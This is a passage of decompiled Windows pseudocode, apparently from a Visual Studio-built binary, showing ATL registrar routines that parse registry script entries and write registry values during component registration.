                      								__ecx = _a8;
                      								__edx =  *_a8;
                      								__eax =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							__edx = _a12;
                      							__eax = _v84;
                      							__ecx =  &_v44;
                      							__edx = _a4;
                      							__ecx = _v28;
                      							_v56 = E00D38580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								goto L8;
                      							} else {
                      								__eax = _v56;
                      								_v2708 = _v56;
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E00D3F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00D34220(__ecx, __eflags) = _v2708;
                      								goto L206;
                      							}
                      						case 2:
                      							__eflags = _a24;
                      							if(__eflags == 0) {
                      								goto L12;
                      							}
                      							__ecx = _a12;
                      							__edx = _v84;
                      							__eax = _a4;
                      							__ecx = _v28;
                      							_v56 = E00D383D0(__ebx, _v28, __edi, __esi, __eflags, _a4, _v84, _a12);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								goto L12;
                      							}
                      							__ecx = _v56;
                      							_v2712 = _v56;
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E00D3F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00D34220(__ecx, __eflags) = _v2712;
                      							goto L206;
                      						case 3:
                      							L12:
                      							__eflags = _a24;
                      							if(__eflags != 0) {
                      								__eax = _a12;
                      								__ecx = _v84;
                      								__edx =  &_v44;
                      								__eax = _a4;
                      								__ecx = _v28;
                      								_v56 = E00D38580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									L26:
                      									__edx = _a8;
                      									 *_a8 =  *_a8 + 4;
                      									__ecx = _a8;
                      									 *_a8 =  *_a8 + 4;
                      									__edx =  &_v96;
                      									__eax =  &_v84;
                      									__ecx =  &_v72;
                      									__edx = _a8;
                      									__eax =  *_a8;
                      									__ecx =  *( *_a8);
                      									__ecx = _v28;
                      									__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      									goto L204;
                      								}
                      								__ecx = _v56;
                      								_v2724 = _v56;
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E00D3F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00D34220(__ecx, __eflags) = _v2724;
                      								goto L206;
                      							}
                      							_v136 = 0;
                      							__ecx =  &_v156;
                      							__eax = E00D3E200( &_v156);
                      							__edx =  &_v136;
                      							__eax =  &_v156;
                      							__ecx = _v84;
                      							__edx = _a12;
                      							__ecx = _v28;
                      							_v56 = E00D38100(__ebx, __ecx, _a12, __edi, __esi, _a12, _v84,  &_v156,  &_v136);
                      							__eflags = _v56;
                      							if(__eflags >= 0) {
                      								_v52 = 2;
                      								__eflags = _a4;
                      								if(_a4 != 0) {
                      									__eflags = _v136;
                      									if(_v136 == 0) {
                      										__edx = _v156;
                      										_v2824 = _v156;
                      									} else {
                      										__ecx = _v136;
                      										_v2824 = _v136;
                      									}
                      									__eax = _v2824;
                      									__ecx = _a4;
                      									__ecx =  &_v44;
                      									_v52 = E00D345F0(__ecx, __esi, _a4, _v2824, 0x2001f);
                      								}
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									L23:
                      									__eax = _a8;
                      									__ecx =  *_a8;
                      									__edx =  *( *_a8);
                      									_v64 =  *( *_a8);
                      									__ecx =  &_v156;
                      									__eax = E00D41F30( &_v156, __eflags);
                      									goto L26;
                      								} else {
                      									__eflags = _v52 - 2;
                      									if(__eflags == 0) {
                      										goto L23;
                      									}
                      									__edx = _v52;
                      									_v2720 = E00D32E00(__ecx, __eflags, _v52);
                      									__ecx =  &_v156;
                      									__eax = E00D41F30( &_v156, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E00D3F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00D34220(__ecx, __eflags) = _v2720;
                      									goto L206;
                      								}
                      							}
                      							__eax = _v56;
                      							_v2716 = _v56;
                      							__ecx =  &_v156;
                      							__eax = E00D41F30( &_v156, __eflags);
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E00D3F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00D34220(__ecx, __eflags) = _v2716;
                      							goto L206;
                      						case 4:
                      							__edx = 0;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								__eax = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x211, 0, "%ls", 0xde40dc);
                      								__eflags = __eax - 1;
                      								if(__eax == 1) {
                      									asm("int3");
                      								}
                      							}
                      							goto L204;
                      						case 5:
                      							__ecx = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__eax = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__ecx = _a24;
                      							__edx = _a20;
                      							__eax = _a16;
                      							__ecx = _a12;
                      							__edx = _a8;
                      							__eax = _v44;
                      							__ecx = _v28;
                      							_v56 = E00D386D0(__ebx, _v28, __edi, __esi, _v44, _a8, _a12, _a16, _a20, _a24);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								__edx =  &_v96;
                      								__eax =  &_v84;
                      								__ecx =  &_v72;
                      								__edx = _a8;
                      								__eax =  *_a8;
                      								__ecx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								__eflags = _a24;
                      								if(_a24 != 0) {
                      									L39:
                      									goto L204;
                      								}
                      								__edx = _v57 & 0x000000ff;
                      								__eflags = _v57 & 0x000000ff;
                      								if((_v57 & 0x000000ff) != 0) {
                      									_v57 = 0;
                      									goto L39;
                      								}
                      								__eax =  &_v192;
                      								__ecx =  &_v180;
                      								__edx =  &_v168;
                      								__eax = _v64;
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(_v28, _v64,  &_v168,  &_v180,  &_v192);
                      								__ecx = _a12;
                      								__edx = _v180;
                      								__eax = _a4;
                      								__ecx = _v28;
                      								_v56 = E00D383D0(__ebx, __ecx, __edi, __esi, __eflags, _a4, _v180, _a12);
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									goto L39;
                      								}
                      								__ecx = _v56;
                      								_v2732 = _v56;
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E00D3F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00D34220(__ecx, __eflags) = _v2732;
                      								goto L206;
                      							}
                      							__ecx = _v56;
                      							_v2728 = _v56;
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E00D3F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00D34220(__ecx, __eflags) = _v2728;
                      							goto L206;
                      						case 6:
                      							__edx = 0;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								__eax = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x228, 0, 0xde40e0, 0xde40dc);
                      								__eflags = __eax - 1;
                      								if(__eax == 1) {
                      									asm("int3");
                      								}
                      							}
                      							_v2736 = 0x80004005;
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E00D3F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00D34220(__ecx, __eflags) = _v2736;
                      							goto L206;
                      						case 7:
                      							_v84 = _v84 | 0x80000000;
                      							_v200 = _v84 | 0x80000000;
                      							__edx = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__ecx = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__edx = _a24;
                      							__eax = _a20;
                      							__ecx = _a16;
                      							__edx = _a12;
                      							__eax = _a8;
                      							__ecx = _v200;
                      							__ecx = _v28;
                      							_v2740 = E00D386D0(__ebx, _v28, __edi, __esi, _v200, _a8, _a12, _a16, _a20, _a24);
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E00D3F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00D34220(__ecx, __eflags) = _v2740;
                      							goto L206;
                      						case 8:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L77:
                      								__edx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__edx =  &_v96;
                      								__eax =  &_v84;
                      								__ecx =  &_v72;
                      								__edx = _a8;
                      								__eax =  *_a8;
                      								__ecx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v201 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__edx = _a4;
                      								_v44 = _a4;
                      								_v201 = 1;
                      							}
                      							__ecx =  &_v220;
                      							__eax = E00D3E200( &_v220);
                      							_v8 = 2;
                      							__ecx =  &_v240;
                      							__eax = E00D3E200( &_v240);
                      							_v8 = 3;
                      							_v252 = 0;
                      							_v264 = 0;
                      							__eax =  &_v252;
                      							__ecx =  &_v220;
                      							__edx = _v96;
                      							__eax = _a12;
                      							__ecx = _v28;
                      							_v56 = E00D38100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v220,  &_v252);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__ecx =  &_v264;
                      									__edx =  &_v240;
                      									__eax = _v84;
                      									__ecx = _a12;
                      									__ecx = _v28;
                      									_v56 = E00D38100(__ebx, _v28,  &_v240, __edi, __esi, _a12, _v84,  &_v240,  &_v264);
                      								}
                      							}
                      							__ecx =  &_v284;
                      							__eax = E00D341C0( &_v284, 0);
                      							_v8 = 4;
                      							__eflags = _v84;
                      							if(_v84 != 0) {
                      								__eax = _a4;
                      								_v284 = _a4;
                      							} else {
                      								__edx = _v44;
                      								_v284 = _v44;
                      							}
                      							__eflags = _v252;
                      							if(_v252 == 0) {
                      								__edx = _v220;
                      								_v2828 = _v220;
                      							} else {
                      								__ecx = _v252;
                      								_v2828 = _v252;
                      							}
                      							__eflags = _v84;
                      							if(_v84 == 0) {
                      								_v2836 = 0;
                      							} else {
                      								__eflags = _v264;
                      								if(_v264 == 0) {
                      									__ecx = _v240;
                      									_v2832 = _v240;
                      								} else {
                      									__eax = _v264;
                      									_v2832 = _v264;
                      								}
                      								__edx = _v2832;
                      								_v2836 = _v2832;
                      							}
                      							__eax = _v2828;
                      							__ecx = _v2836;
                      							__ecx =  &_v284;
                      							_v52 = E00D34840(__ecx, __esi, _v2836, _v2828, 1);
                      							_v284 = 0;
                      							__eflags = _v52;
                      							if(__eflags == 0) {
                      								__eax = _v201 & 0x000000ff;
                      								__eflags = _v201 & 0x000000ff;
                      								if((_v201 & 0x000000ff) != 0) {
                      									_v44 = 0;
                      								}
                      								__eflags = _v84;
                      								if(_v84 == 0) {
                      									_v2844 = "default";
                      								} else {
                      									__eflags = _v264;
                      									if(_v264 == 0) {
                      										__edx = _v240;
                      										_v2840 = _v240;
                      									} else {
                      										__ecx = _v264;
                      										_v2840 = _v264;
                      									}
                      									__eax = _v2840;
                      									_v2844 = _v2840;
                      								}
                      								__eflags = _v252;
                      								if(__eflags == 0) {
                      									__edx = _v220;
                      									_v2848 = _v220;
                      								} else {
                      									__ecx = _v252;
                      									_v2848 = _v252;
                      								}
                      								__eax = _v2844;
                      								_push(_v2844);
                      								__ecx = _v2848;
                      								__ecx = 0xf237ac;
                      								__eax = E00D3F1F0(0xf237ac);
                      								__ecx =  &_v2752;
                      								E00D323B0( &_v2752, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x24e) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2848);
                      								_v8 = 3;
                      								__ecx =  &_v284;
                      								__eax = E00D34220( &_v284, __eflags);
                      								_v8 = 2;
                      								__ecx =  &_v240;
                      								__eax = E00D41F30( &_v240, __eflags);
                      								_v8 = 1;
                      								__ecx =  &_v220;
                      								__eax = E00D41F30( &_v220, __eflags);
                      								goto L77;
                      							} else {
                      								__edx = _v52;
                      								_v2744 = E00D32E00(__ecx, __eflags, _v52);
                      								_v8 = 3;
                      								__ecx =  &_v284;
                      								__eax = E00D34220( &_v284, __eflags);
                      								_v8 = 2;
                      								__ecx =  &_v240;
                      								__eax = E00D41F30( &_v240, __eflags);
                      								_v8 = 1;
                      								__ecx =  &_v220;
                      								__eax = E00D41F30( &_v220, __eflags);
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E00D3F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00D34220(__ecx, __eflags) = _v2744;
                      								goto L206;
                      							}
                      						case 9:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L126:
                      								__eax = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__edx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__eax =  &_v96;
                      								__ecx =  &_v84;
                      								__edx =  &_v72;
                      								__eax = _a8;
                      								__ecx =  *_a8;
                      								__edx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v289 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__edx = _a4;
                      								_v44 = _a4;
                      								_v289 = 1;
                      							}
                      							__ecx =  &_v308;
                      							__eax = E00D3E200( &_v308);
                      							_v8 = 5;
                      							__ecx =  &_v328;
                      							__eax = E00D3E200( &_v328);
                      							_v8 = 6;
                      							_v340 = 0;
                      							_v352 = 0;
                      							__eax =  &_v340;
                      							__ecx =  &_v308;
                      							__edx = _v96;
                      							__eax = _a12;
                      							__ecx = _v28;
                      							_v56 = E00D38100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v308,  &_v340);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__ecx =  &_v352;
                      									__edx =  &_v328;
                      									__eax = _v84;
                      									__ecx = _a12;
                      									__ecx = _v28;
                      									_v56 = E00D38100(__ebx, _v28,  &_v328, __edi, __esi, _a12, _v84,  &_v328,  &_v352);
                      								}
                      							}
                      							__eflags = _v84;
                      							if(_v84 == 0) {
                      								_v2856 = "default";
                      							} else {
                      								__eflags = _v352;
                      								if(_v352 == 0) {
                      									__eax = _v328;
                      									_v2852 = _v328;
                      								} else {
                      									__edx = _v352;
                      									_v2852 = _v352;
                      								}
                      								__ecx = _v2852;
                      								_v2856 = _v2852;
                      							}
                      							__eflags = _v340;
                      							if(__eflags == 0) {
                      								__eax = _v308;
                      								_v2860 = _v308;
                      							} else {
                      								__edx = _v340;
                      								_v2860 = _v340;
                      							}
                      							__ecx = _v2856;
                      							_push(_v2856);
                      							__edx = _v2860;
                      							__ecx = 0xf237ac;
                      							__eax = E00D3F1F0(0xf237ac);
                      							__ecx =  &_v2760;
                      							E00D323B0( &_v2760, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x265) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2860);
                      							__eflags = _v340;
                      							if(_v340 == 0) {
                      								__ecx = _v308;
                      								_v2864 = _v308;
                      							} else {
                      								__eax = _v340;
                      								_v2864 = _v340;
                      							}
                      							__edx = _v2864;
                      							_v360 = _v2864;
                      							__eax = _v360;
                      							__eax = E00D82E00(_v360);
                      							_v364 = __eax;
                      							__ecx =  &_v1396;
                      							__eax = E00D3EAC0( &_v1396);
                      							_v8 = 7;
                      							_v8 = 8;
                      							__ecx = _v364;
                      							__ecx =  &_v1396;
                      							__eax = E00D3EA30(__ebx,  &_v1396, __eflags, _v364);
                      							_v8 = 7;
                      							__ecx =  &_v1396;
                      							__eax = E00D3EA70( &_v1396);
                      							__eflags = __eax;
                      							if(__eax == 0) {
                      								_v2768 = 0x8007000e;
                      								_v8 = 6;
                      								__ecx =  &_v1396;
                      								__eax = E00D3EA80( &_v1396);
                      								_v8 = 5;
                      								__ecx =  &_v328;
                      								__eax = E00D41F30( &_v328, __eflags);
                      								_v8 = 1;
                      								__ecx =  &_v308;
                      								__eax = E00D41F30( &_v308, __eflags);
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E00D3F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00D34220(__ecx, __eflags) = _v2768;
                      								goto L206;
                      							} else {
                      								__ecx =  &_v1396;
                      								_v1404 = E00D3EA70( &_v1396);
                      								__edx = _v360;
                      								_v1408 = _v360;
                      								_v364 = 0;
                      								while(1) {
                      									__eax = _v1408;
                      									__ecx =  *_v1408;
                      									__eflags =  *_v1408;
                      									if( *_v1408 == 0) {
                      										break;
                      									}
                      									__esi = __esp;
                      									__edx = _v1408;
                      									__eax = CharNextA(_v1408);
                      									__eflags = __esp - __esp;
                      									_v1412 = __eax;
                      									__eax = _v1408;
                      									__ecx =  *_v1408;
                      									__eflags =  *_v1408 - 0x5c;
                      									if( *_v1408 != 0x5c) {
                      										L104:
                      										__ecx = _v1404;
                      										__edx = _v1408;
                      										__al =  *_v1408;
                      										 *_v1404 = __al;
                      										__esi = __esp;
                      										__ecx = _v1408;
                      										__edx =  *_v1408 & 0x000000ff;
                      										__eax = IsDBCSLeadByte( *_v1408 & 0x000000ff);
                      										__eflags = __esi - __esp;
                      										__eax = E00DC1520(__eax, __esi - __esp);
                      										__eflags = __eax;
                      										if(__eax == 0) {
                      											L108:
                      											_v1404 = _v1404 + 1;
                      											_v1404 = _v1404 + 1;
                      											__edx = _v1408;
                      											__edx =  &(_v1408[1]);
                      											__eflags = __edx;
                      											_v1408 = __edx;
                      											L109:
                      											_v364 = _v364 + 1;
                      											_v364 = _v364 + 1;
                      											continue;
                      										}
                      										_v1404 = _v1404 + 1;
                      										_v1404 = _v1404 + 1;
                      										_v1408 =  &(_v1408[1]);
                      										_v1408 =  &(_v1408[1]);
                      										__edx = _v1408;
                      										__eax =  *_v1408;
                      										__eflags =  *_v1408;
                      										if( *_v1408 != 0) {
                      											__ecx = _v1404;
                      											__edx = _v1408;
                      											__al =  *_v1408;
                      											 *_v1404 = __al;
                      											goto L108;
                      										}
                      										break;
                      									}
                      									__edx = _v1412;
                      									__eax =  *_v1412;
                      									__eflags =  *_v1412 - 0x30;
                      									if( *_v1412 != 0x30) {
                      										goto L104;
                      									}
                      									__ecx = _v1404;
                      									 *_v1404 = 0;
                      									_v1404 = _v1404 + 1;
                      									_v1404 = _v1404 + 1;
                      									__esi = __esp;
                      									__eax = _v1412;
                      									__eax = CharNextA(_v1412);
                      									__eflags = __esi - __esp;
                      									_v1408 = __eax;
                      									goto L109;
                      								}
                      								__ecx = _v1404;
                      								 *_v1404 = 0;
                      								_v1404 = _v1404 + 1;
                      								_v1404 = _v1404 + 1;
                      								__eax = _v1404;
                      								 *_v1404 = 0;
                      								__ecx =  &_v1428;
                      								__eax = E00D341C0( &_v1428, 0);
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__edx = _a4;
                      									_v1428 = _a4;
                      								} else {
                      									__ecx = _v44;
                      									_v1428 = _v44;
                      								}
                      								__eflags = _v84;
                      								if(_v84 == 0) {
                      									_v2872 = 0;
                      								} else {
                      									__eflags = _v352;
                      									if(_v352 == 0) {
                      										__ecx = _v328;
                      										_v2868 = _v328;
                      									} else {
                      										__eax = _v352;
                      										_v2868 = _v352;
                      									}
                      									__edx = _v2868;
                      									_v2872 = _v2868;
                      								}
                      								__ecx =  &_v1396;
                      								E00D3EA70( &_v1396) = _v2872;
                      								__ecx =  &_v1428;
                      								_v52 = E00D34960( &_v1428, __esi, _v2872, _v2872);
                      								_v1428 = 0;
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									__edx = _v289 & 0x000000ff;
                      									__eflags = _v289 & 0x000000ff;
                      									if(__eflags != 0) {
                      										_v44 = 0;
                      									}
                      									__ecx =  &_v1428;
                      									__eax = E00D34220( &_v1428, __eflags);
                      									_v8 = 6;
                      									__ecx =  &_v1396;
                      									__eax = E00D3EA80( &_v1396);
                      									_v8 = 5;
                      									__ecx =  &_v328;
                      									__eax = E00D41F30( &_v328, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v308;
                      									__eax = E00D41F30( &_v308, __eflags);
                      									goto L126;
                      								} else {
                      									__ecx = _v52;
                      									_v2764 = E00D32E00(_v52, __eflags, _v52);
                      									__ecx =  &_v1428;
                      									__eax = E00D34220( &_v1428, __eflags);
                      									_v8 = 6;
                      									__ecx =  &_v1396;
                      									__eax = E00D3EA80( &_v1396);
                      									_v8 = 5;
                      									__ecx =  &_v328;
                      									__eax = E00D41F30( &_v328, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v308;
                      									__eax = E00D41F30( &_v308, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E00D3F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00D34220(__ecx, __eflags) = _v2764;
                      									goto L206;
                      								}
                      							}
                      						case 0xa:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L160:
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__eax = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx =  &_v96;
                      								__edx =  &_v84;
                      								__eax =  &_v72;
                      								__ecx = _a8;
                      								__edx =  *_a8;
                      								__eax =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v1433 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__eax = _a4;
                      								_v44 = _a4;
                      								_v1433 = 1;
                      							}
                      							__ecx =  &_v1452;
                      							__eax = E00D3E200( &_v1452);
                      							_v8 = 0xa;
                      							__ecx =  &_v1472;
                      							__eax = E00D3E200( &_v1472);
                      							_v8 = 0xb;
                      							_v1484 = 0;
                      							_v1496 = 0;
                      							__ecx =  &_v1508;
                      							__edx = _v96;
                      							__eax = _a16;
                      							__ecx = _v28;
                      							_v56 = E00D38330(_v28, _a16, _v96,  &_v1508);
                      							__eflags = _v56 - 1;
                      							if(_v56 != 1) {
                      								L137:
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									__eflags = _v84;
                      									if(_v84 != 0) {
                      										__eax =  &_v1496;
                      										__ecx =  &_v1472;
                      										__edx = _v84;
                      										__eax = _a12;
                      										__ecx = _v28;
                      										_v56 = E00D38100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1472,  &_v1496);
                      									}
                      								}
                      								__ecx =  &_v1540;
                      								__eax = E00D341C0( &_v1540, 0);
                      								_v8 = 0xc;
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__edx = _a4;
                      									_v1540 = _a4;
                      								} else {
                      									__ecx = _v44;
                      									_v1540 = _v44;
                      								}
                      								__eflags = _v1496;
                      								if(_v1496 == 0) {
                      									__ecx = _v1472;
                      									_v2880 = _v1472;
                      								} else {
                      									__eax = _v1496;
                      									_v2880 = _v1496;
                      								}
                      								__edx = _v1508;
                      								__eax = _v2880;
                      								__ecx =  &_v1540;
                      								_v52 = E00D347C0( &_v1540, __esi, _v2880, _v1508);
                      								_v1540 = 0;
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									__edx = _v1433 & 0x000000ff;
                      									__eflags = _v1433 & 0x000000ff;
                      									if((_v1433 & 0x000000ff) != 0) {
                      										_v44 = 0;
                      									}
                      									__eflags = _v84;
                      									if(_v84 == 0) {
                      										_v2888 = "default";
                      									} else {
                      										__eflags = _v1496;
                      										if(_v1496 == 0) {
                      											__ecx = _v1472;
                      											_v2884 = _v1472;
                      										} else {
                      											__eax = _v1496;
                      											_v2884 = _v1496;
                      										}
                      										__edx = _v2884;
                      										_v2888 = _v2884;
                      									}
                      									__eflags = _v1484;
                      									if(__eflags == 0) {
                      										__ecx = _v1452;
                      										_v2892 = _v1452;
                      									} else {
                      										__eax = _v1484;
                      										_v2892 = _v1484;
                      									}
                      									__edx = _v2888;
                      									_push(_v2888);
                      									__eax = _v2892;
                      									__ecx = 0xf237ac;
                      									__eax = E00D3F1F0(0xf237ac);
                      									__ecx =  &_v2784;
                      									E00D323B0( &_v2784, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2d2) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2892);
                      									_v8 = 0xb;
                      									__ecx =  &_v1540;
                      									__eax = E00D34220( &_v1540, __eflags);
                      									_v8 = 0xa;
                      									__ecx =  &_v1472;
                      									__eax = E00D41F30( &_v1472, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1452;
                      									__eax = E00D41F30( &_v1452, __eflags);
                      									goto L160;
                      								} else {
                      									__ecx = _v52;
                      									_v2776 = E00D32E00(_v52, __eflags, _v52);
                      									_v8 = 0xb;
                      									__ecx =  &_v1540;
                      									__eax = E00D34220( &_v1540, __eflags);
                      									_v8 = 0xa;
                      									__ecx =  &_v1472;
                      									__eax = E00D41F30( &_v1472, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1452;
                      									__eax = E00D41F30( &_v1452, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E00D3F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00D34220(__ecx, __eflags) = _v2776;
                      									goto L206;
                      								}
                      							} else {
                      								__ecx =  &_v1484;
                      								__edx =  &_v1452;
                      								__eax = _v1508;
                      								__ecx = _a12;
                      								__ecx = _v28;
                      								__eax = E00D38100(__ebx, _v28,  &_v1452, __edi, __esi, _a12, _v1508,  &_v1452,  &_v1484);
                      								__eflags = _v1484;
                      								if(__eflags == 0) {
                      									__eax = _v1452;
                      									_v2876 = _v1452;
                      								} else {
                      									__edx = _v1484;
                      									_v2876 = _v1484;
                      								}
                      								__ecx = _v2876;
                      								__ecx =  &_v1520;
                      								__eax = E00D3E4E0(__ebx,  &_v1520, __eflags, _v2876);
                      								__esi = __esp;
                      								__edx =  &_v1508;
                      								_push( &_v1508);
                      								_push(0);
                      								_push(0);
                      								__ecx =  &_v1520;
                      								__eax = E00D3E570( &_v1520);
                      								_push(__eax);
                      								__imp__#277();
                      								__eflags = __esi - __esp;
                      								_v56 = __eax;
                      								__eflags = _v56;
                      								if(__eflags >= 0) {
                      									__ecx =  &_v1520;
                      									__eax = E00D3E4B0( &_v1520, __eflags);
                      									goto L137;
                      								} else {
                      									_v2772 = 0x80004005;
                      									__ecx =  &_v1520;
                      									__eax = E00D3E4B0( &_v1520, __eflags);
                      									_v8 = 0xa;
                      									__ecx =  &_v1472;
                      									__eax = E00D41F30( &_v1472, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1452;
                      									__eax = E00D41F30( &_v1452, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E00D3F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00D34220(__ecx, __eflags) = _v2772;
                      									goto L206;
                      								}
                      							}
                      						case 0xb:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L200:
                      								__edx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__edx =  &_v96;
                      								__eax =  &_v84;
                      								__ecx =  &_v72;
                      								__edx = _a8;
                      								__eax =  *_a8;
                      								__ecx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v1545 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__ecx = _a4;
                      								_v44 = _a4;
                      								_v1545 = 1;
                      							}
                      							__ecx =  &_v1564;
                      							__eax = E00D3E200( &_v1564);
                      							_v8 = 0xd;
                      							__ecx =  &_v1584;
                      							__eax = E00D3E200( &_v1584);
                      							_v8 = 0xe;
                      							_v1596 = 0;
                      							_v1608 = 0;
                      							__ecx =  &_v2656;
                      							__eax = E00D3E010( &_v2656);
                      							_v8 = 0xf;
                      							__edx =  &_v2668;
                      							__eax =  &_v1620;
                      							__ecx = _v96;
                      							__edx = _a20;
                      							__ecx = _v28;
                      							_v56 = E00D38370(_v28, _a20, _v96,  &_v1620,  &_v2668);
                      							__eflags = _v56 - 1;
                      							if(_v56 != 1) {
                      								L177:
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									__eflags = _v84;
                      									if(_v84 != 0) {
                      										__eax =  &_v1608;
                      										__ecx =  &_v1584;
                      										__edx = _v84;
                      										__eax = _a12;
                      										__ecx = _v28;
